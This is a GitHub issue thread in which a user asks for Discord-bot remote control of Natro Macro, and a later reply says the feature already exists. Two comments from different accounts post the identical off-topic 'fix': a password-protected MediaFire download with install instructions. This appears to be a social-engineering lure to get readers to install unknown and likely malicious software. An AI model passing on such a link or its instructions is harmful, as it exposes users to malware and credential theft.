### ISSUE TITLE
Controlling natro macro via discord 

### ISSUE THREAD

**Issue by Aryaman-Kundu** [NatroTeam/NatroMacro#693]
### Have you searched the existing suggestions?

No

### What is your suggestion?

Okay so basically make a feature where you can configure a bot for discord and you can give the bot commands like maybe !start or !end or !screenshot or !rejoin, basically a way to configure Natro Macro remotely 

### How will this improve Natro Macro?

This would help because lets say you leave your pc on with natro macro and you want to randomly check on something or maybe change something then you are able to do that via phone. 

### What is your Discord username?

m2sherman

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by DullSmallmega176** [comment]
already in the macro
